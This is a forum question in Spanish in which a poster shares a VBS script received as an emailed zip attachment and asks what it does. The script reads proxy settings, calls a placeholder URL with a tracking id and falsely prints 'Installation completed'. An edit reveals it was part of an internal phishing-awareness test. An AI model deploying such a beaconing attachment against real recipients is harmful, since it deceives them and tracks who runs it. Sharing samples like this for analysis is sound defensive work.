Hoy recibimos un script vbs malicioso en nuestro buzón (el archivo adjunto era un zip que contenía el script).
Debajo puede encontrar la fuente (nota: el dominio cambió debido a que no quiere propagar malware, pero los parámetros siguen siendo los mismos).
Dim ProxyOn, ProxyServer, ProxyOverride
Dim h, hh, s, u
Set s = CreateObject("wscript.Shell")
u = "https://example.com/?rid%3DVGX0Ipd&pad%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
u = Replace(u, "%3D", "=")
On Error Resume Next
ProxyOn = s.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\" & "ProxyEnable")
ProxyServer = s.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\" & "ProxyServer")
Set h = CreateObject("WinHttp.WinHttpRequest.5.1")
Set hh = CreateObject("WinHttp.WinHttpRequest.5.1")
If ProxyOn = 1 Then
h.SetProxy 2, ProxyServer
End If
hh.SetProxy 1, ProxyServer
On Error Resume Next
h.Open "GET", u, False
h.SetTimeouts 10000, 10000, 10000, 10000
h.Send
If Err.Number <> 0 Then
On Error Resume Next
hh.Open "GET", u, False
hh.SetTimeouts 10000, 10000, 10000, 10000
hh.Send
End If
WScript.Sleep 2000
WScript.Echo "Installation completed."
Para mí, no parece hacer mucho, lee la configuración del proxy (¿para evitar el firewall?) y emite un comando GET a la URL (maliciosa), pero no hace nada con la respuesta.
Por supuesto que no intentamos correr.
¿Qué intenta hacer exactamente este código?
EDITAR: ¡Hoy recibimos la confirmación de que esto es parte de una campaña sobre seguridad cibernética en la empresa! El análisis en la respuesta es correcto.
Saludos cordiales!